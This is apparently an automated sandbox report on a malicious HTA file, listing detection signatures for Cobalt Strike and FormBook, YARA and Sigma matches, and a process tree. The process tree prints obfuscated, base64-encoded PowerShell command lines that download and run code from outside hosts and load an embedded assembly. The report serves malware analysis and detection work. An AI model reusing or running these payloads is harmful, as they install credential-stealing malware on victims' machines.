Edit tour
Windows
Analysis Report
maybecreatebesthingswithgreatnicewhichgivenbreakingthingstobe.hta
Overview
General Information
Detection
Cobalt Strike, FormBook, HTMLPhisher
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Detected Cobalt Strike Beacon
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
Yara detected HtmlPhish44
Yara detected Powershell decode and execute
Yara detected Powershell download and execute
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
PowerShell case anomaly found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: WScript or CScript Dropper
Suspicious command line found
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Compiles C# or VB.Net code
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: AspNetCompiler Execution
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
- mshta.exe (PID: 5440 cmdline:
mshta.exe "C:\Users\ user\Deskt op\maybecr eatebesthi ngswithgre atnicewhic hgivenbrea kingthings tobe.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505) - cmd.exe (PID: 4460 cmdline:
"C:\Window s\system32 \cmd.exe" "/C POwERs HELL.exE -Ex bYPAss -nOP -w 1 -C De viceCREdEn tiAldEPloY mENT ; Inv oKE-eXPRES Sion($(inv okE-EXpRes sion('[SYS TeM.Text.E ncodInG]'+ [ChAr]58+[ chaR]0x3A+ 'utF8.geTs TRinG([sys tEM.coNvER t]'+[CHAR] 0X3A+[ChaR ]58+'FroMB aSe64sTRiN g('+[chAr] 34+'JGhvNG JXICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICA9ICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICBB ZGQtdHlwRS AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgLW1FbUJF cmRlRmlOaV RpT04gICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICdb RGxsSW1wb3 J0KCJ1ckxt T04uZGxMIi wgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgIENoYXJT ZXQgPSBDaG FyU2V0LlVu aWNvZGUpXX B1YmxpYyBz dGF0aWMgZX h0ZXJuIElu dFB0ciBVUk xEb3dubG9h ZFRvRmlsZS hJbnRQdHIg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg IFFtUWgsc3 RyaW5nICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICBE LHN0cmluZy AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgS0xheVVl cUplbyx1aW 50ICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICBkTSxJ bnRQdHIgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIE twQSk7JyAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg LW5BbWUgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC JqempoIiAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg LU5BbUVTcE FDZSAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgcklU U0JxeUlCIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AtUGFzc1Ro cnU7ICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAkaG 80Ylc6OlVS TERvd25sb2 FkVG9GaWxl KDAsImh0dH A6Ly8xNzIu MjQ1LjEyMy 4zLzc4NC92 ZXJ5Z3JlYX R0cmFmZmlj d2l0aG5pY2 V3b3JraW5n c2tpbGx0b2 JlZ29vZC50 SUYiLCIkRW 52OkFQUERB VEFcdmVyeW dyZWF0dHJh ZmZpY3dpdG huaWNld29y a2luZ3NraW xsdG9iZWdv LnZiUyIsMC wwKTtzVEFy dC1TTGVlcC gzKTtJaSAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg IiRFblY6QV BQREFUQVx2 ZXJ5Z3JlYX R0cmFmZmlj d2l0aG5pY2 V3b3JraW5n c2tpbGx0b2 JlZ28udmJT Ig=='+[CHA R]34+'))') ))" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 6596 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 2872 cmdline:
POwERsHELL .exE -Ex bYPAss -nOP -w 1 -C Devic eCREdEntiA ldEPloYmEN T ; InvoKE -eXPRESSio n($(invokE -EXpRessio n('[SYSTeM .Text.Enco dInG]'+[Ch Ar]58+[cha R]0x3A+'ut F8.geTsTRi nG([systEM .coNvERt]' +[CHAR]0X3 A+[ChaR]58 +'FroMBaSe 64sTRiNg(' +[chAr]34+ 'JGhvNGJXI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CA9ICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICBBZGQ tdHlwRSAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgL W1FbUJFcmR lRmlOaVRpT 04gICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICdbRGx sSW1wb3J0K CJ1ckxtT04 uZGxMIiwgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI ENoYXJTZXQ gPSBDaGFyU 2V0LlVuaWN vZGUpXXB1Y mxpYyBzdGF 0aWMgZXh0Z XJuIEludFB 0ciBVUkxEb 3dubG9hZFR vRmlsZShJb nRQdHIgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgIFF tUWgsc3Rya W5nICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICBELHN 0cmluZyAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgS 0xheVVlcUp lbyx1aW50I CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CBkTSxJbnR QdHIgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgIEtwQ Sk7JyAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgLW5 BbWUgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICJqe mpoIiAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgLU5 BbUVTcEFDZ SAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgcklUU0J xeUlCICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAtU GFzc1RocnU 7ICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAkaG80Y lc6OlVSTER vd25sb2FkV G9GaWxlKDA sImh0dHA6L y8xNzIuMjQ 1LjEyMy4zL zc4NC92ZXJ 5Z3JlYXR0c mFmZmljd2l 0aG5pY2V3b 3JraW5nc2t pbGx0b2JlZ 29vZC50SUY iLCIkRW52O kFQUERBVEF cdmVyeWdyZ WF0dHJhZmZ pY3dpdGhua WNld29ya2l uZ3NraWxsd G9iZWdvLnZ iUyIsMCwwK TtzVEFydC1 TTGVlcCgzK TtJaSAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgIiR FblY6QVBQR EFUQVx2ZXJ 5Z3JlYXR0c mFmZmljd2l 0aG5pY2V3b 3JraW5nc2t pbGx0b2JlZ 28udmJTIg= ='+[CHAR]3 4+'))')))" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - csc.exe (PID: 1492 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\csc .exe" /noc onfig /ful lpaths @"C :\Users\us er\AppData \Local\Tem p\dtaz5slk \dtaz5slk. cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D) - cvtres.exe (PID: 3472 cmdline:
C:\Windows \Microsoft .NET\Frame work\v4.0. 30319\cvtr es.exe /NO LOGO /READ ONLY /MACH INE:IX86 " /OUT:C:\Us ers\user\A ppData\Loc al\Temp\RE S5695.tmp" "c:\Users \user\AppD ata\Local\ Temp\dtaz5 slk\CSCC90 739EC0644D C2B3B75DC9 F86B7B59.T MP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0) - wscript.exe (PID: 3360 cmdline:
"C:\Window s\System32 \WScript.e xe" "C:\Us ers\user\A ppData\Roa ming\veryg reattraffi cwithnicew orkingskil ltobego.vb S" MD5: FF00E0480075B095948000BDC66E81F0) - powershell.exe (PID: 5988 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" $olhento = 'JGNoYXJj byA9ICdodH RwczovL3Jl cy5jbG91ZG luYXJ5LmNv bS9keXRmbH Q2MW4vaW1h Z2UvdXBsb2 FkL3YxNzMz MTM0OTQ3L2 JrbHB5c2V5 ZXV0NGltcH c1MG4xLmpw ZyAnOyRjb2 1wb3NpdGl2 byA9IE5ldy 1PYmplY3Qg U3lzdGVtLk 5ldC5XZWJD bGllbnQ7JG Fydm9yaWZv cm1lID0gJG NvbXBvc2l0 aXZvLkRvd2 5sb2FkRGF0 YSgkY2hhcm NvKTskcHJv bWV0ZWRvci A9IFtTeXN0 ZW0uVGV4dC 5FbmNvZGlu Z106OlVURj guR2V0U3Ry aW5nKCRhcn Zvcmlmb3Jt ZSk7JGZ1c2 NpdGUgPSAn PDxCQVNFNj RfU1RBUlQ+ Pic7JHRhdm lsYSA9ICc8 PEJBU0U2NF 9FTkQ+Pic7 JG1pbmlzdG VyaWFsbWVu dGUgPSAkcH JvbWV0ZWRv ci5JbmRleE 9mKCRmdXNj aXRlKTskZG VzY3J1emFy ID0gJHByb2 1ldGVkb3Iu SW5kZXhPZi gkdGF2aWxh KTskbWluaX N0ZXJpYWxt ZW50ZSAtZ2 UgMCAtYW5k ICRkZXNjcn V6YXIgLWd0 ICRtaW5pc3 RlcmlhbG1l bnRlOyRtaW 5pc3Rlcmlh bG1lbnRlIC s9ICRmdXNj aXRlLkxlbm d0aDskZG9p ZGVqYW50ZS A9ICRkZXNj cnV6YXIgLS AkbWluaXN0 ZXJpYWxtZW 50ZTskY2Fz Y2V0YSA9IC Rwcm9tZXRl ZG9yLlN1Yn N0cmluZygk bWluaXN0ZX JpYWxtZW50 ZSwgJGRvaW RlamFudGUp OyR0cmljaG luYWRvID0g LWpvaW4gKC RjYXNjZXRh LlRvQ2hhck FycmF5KCkg fCBGb3JFYW NoLU9iamVj dCB7ICRfIH 0pWy0xLi4t KCRjYXNjZX RhLkxlbmd0 aCldOyR0cm VzY2FsYW50 ZSA9IFtTeX N0ZW0uQ29u dmVydF06Ok Zyb21CYXNl NjRTdHJpbm coJHRyaWNo aW5hZG8pOy RkaWFsZWN0 byA9IFtTeX N0ZW0uUmVm bGVjdGlvbi 5Bc3NlbWJs eV06OkxvYW QoJHRyZXNj YWxhbnRlKT skbW9zbGVt aXRhID0gW2 RubGliLklP LkhvbWVdLk dldE1ldGhv ZCgnVkFJJy k7JG1vc2xl bWl0YS5Jbn Zva2UoJG51 bGwsIEAoJ3 R4dC5NQVJS TUFDLzQ4Ny 8zLjMyMS41 NDIuMjcxLy 86cHR0aCcs ICckbW92ZW RvcicsICck bW92ZWRvci csICckbW92 ZWRvcicsIC dhc3BuZXRf Y29tcGlsZX InLCAnJG1v dmVkb3InLC AnJG1vdmVk b3InLCckbW 92ZWRvcics JyRtb3ZlZG 9yJywnJG1v dmVkb3InLC ckbW92ZWRv cicsJyRtb3 ZlZG9yJywn MScsJyRtb3 ZlZG9yJykp Ow==';$ame nista = [S ystem.Text .Encoding] ::UTF8.Get String([Sy stem.Conve rt]::FromB ase64Strin g($olhento ));Invoke- Expression $amenista MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - conhost.exe (PID: 5800 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - aspnet_compiler.exe (PID: 2720 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\asp net_compil er.exe" MD5: FDA8C8F2A4E100AFB14C13DFCBCAB2D2) - lSomfUdjbC.exe (PID: 3992 cmdline:
"C:\Progra m Files (x 86)\odHBSJ DnYjlhMohj sdrGeWZUjm oaqIocCpQt kevhqvZNBD jCKrRtgWnc aZfuhnmQDw FlDFGcaSgO Wel\lSomfU djbC.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717) - ieUnatt.exe (PID: 3360 cmdline:
"C:\Window s\SysWOW64 \ieUnatt.e xe" MD5: 4E9919DF2EF531B389ABAEFD35AD546E) - firefox.exe (PID: 5668 cmdline:
"C:\Progra m Files\Mo zilla Fire fox\Firefo x.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
Formbook, Formbo | FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware. |
⊘No configs have been found
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_HtmlPhish_44 | Yara detected HtmlPhish_44 | Joe Security |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | ||
Windows_Trojan_Formbook_1112e116 | unknown | unknown |
| |
JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | ||
Windows_Trojan_Formbook_1112e116 | unknown | unknown |
| |
JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | ||
Click to see the 13 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | ||
Windows_Trojan_Formbook_1112e116 | unknown | unknown |
| |
JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | ||
Windows_Trojan_Formbook_1112e116 | unknown | unknown |
|
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | ||
JoeSecurity_PowershellDecodeAndExecute | Yara detected Powershell decode and execute | Joe Security |
System Summary |
---|
Source: | Author: Florian Roth (Nextron Systems): |